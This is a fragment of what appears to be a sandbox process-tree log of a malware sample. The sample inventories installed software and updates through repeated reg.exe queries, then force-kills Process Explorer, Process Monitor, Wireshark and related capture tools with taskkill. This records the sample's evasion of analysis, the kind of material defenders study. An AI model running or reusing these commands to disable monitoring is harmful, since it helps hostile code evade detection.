-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1532
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1184
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1256
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:680
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:748
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:240
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:796
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1932
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1940
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1884
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1952
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1080
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1916
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1912
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1828
-